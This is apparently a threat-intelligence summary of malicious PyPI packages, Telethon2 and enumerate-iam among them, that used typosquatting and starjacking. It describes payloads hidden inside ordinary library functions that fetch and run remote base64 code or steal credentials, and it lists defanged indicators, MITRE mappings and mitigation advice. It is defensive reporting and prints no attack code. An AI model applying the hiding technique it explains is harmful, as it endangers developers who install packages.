Keypoints
- An attacker uploaded multiple malicious PyPI packages (typosquatting and starjacking) targeting developers using Telegram, AWS, and Alibaba Cloud.
- Malicious code was embedded inside specific functions rather than in auto-executing setup files, activating only when those functions were called.
- Attack techniques used: Typosquatting (similar package names) and Starjacking (linking to unrelated popular GitHub repos to falsify popularity).
- Telethon2 copied legitimate Telethon code but inserted code in telethon/client/messages.py to fetch and decode external base64 content and run OS commands.
- enumerate-iam mimicked a popular GitHub repo that lacked a PyPI package and contained function-level code to steal sensitive credentials when executed.
- Checkmarx and other researchers (Phylum) identified and reported a list of 14 malicious packages to help defenders remediate.
MITRE Techniques
- [T1195.002] Compromise Software Dependencies and Development Tools – Attacker uploaded malicious packages to PyPI using typosquatting/starjacking: [‘uploaded a series of malicious packages to the PyPi package manager’]
- [T1036.005] Masquerading – Package names and GitHub links were used to impersonate legitimate projects: [‘mimicking a popular repo’]
- [T1027] Obfuscated Files or Information – Malicious logic was hidden inside functions to evade scanners that look for auto-executing scripts: [’embedded malicious scripts deep within the package, within specific functions’]
- [T1105] Ingress Tool Transfer – Packages fetched external base64-encoded content from a remote domain before decoding and executing it: [‘fetches external base64-encoded content from “hxxps[:]//tg[.]aliyun-sdk-requests[.]xyz/telegram”‘]
- [T1059] Command and Scripting Interpreter – Decoded content was executed as OS commands on the host: [‘then decodes it to execute OS commands’]
- [T1552.001] Credentials in Files (Unsecured Credentials) – Malicious package functionality attempted to steal sensitive credentials when triggered: [‘attempts to steal sensitive credentials’]
Indicators of Compromise
- [Domain] Remote payload host – hxxps[:]//tg[.]aliyun-sdk-requests[.]xyz/telegram (used to fetch base64-encoded payloads)
- [Package name] Malicious PyPI packages – Telethon2, enumerate-iam, and 12 more packages (total list includes aliababcloud-tea-openapi, aliyun-oss2, aws-consoler2, etc.)
- [File/path] Malicious code locations – telethon2-1.30.3/telethon/client/messages.py (malicious lines hidden in send_message function)
- [Account] Attacker handle – kohlersbtuh15 (PyPI account used to publish packages)
In September 2023 an actor published multiple PyPI packages that impersonated legitimate projects (typosquatting) and linked to unrelated popular GitHub repositories (starjacking) to appear trustworthy. Instead of placing payloads in setup or install scripts, the attacker embedded malicious routines inside standard library functions so the code remained dormant until a developer called those functions during normal use; this evasion increases the chance of bypassing automated scanners that focus on install-time execution.
In the Telethon2 package the attacker copied legitimate Telethon source and inserted two lines inside telethon/client/messages.py that request a base64 payload from tg.aliyun-sdk-requests[.]xyz, decode it, and execute it as OS commands. Other packages (for example enumerate-iam) used the same pattern but with credential-theft logic: when specific APIs or helper functions run, they attempt to harvest sensitive credentials or configuration data. These behaviors combine supply-chain compromise (T1195.002), masquerading (T1036.005), in-place obfuscation (T1027), remote payload retrieval (T1105), and command execution (T1059).
Mitigation guidance: audit and pin direct package dependencies, monitor for newly published packages that mirror your project names, maintain placeholder packages where appropriate to prevent squatting, and scan installed libraries for network fetches or inline decoding/execution patterns. Investigate any use of the listed packages or calls to modified library functions (e.g., send_message in telethon/client/messages.py) and block the indicated domain at the network perimeter.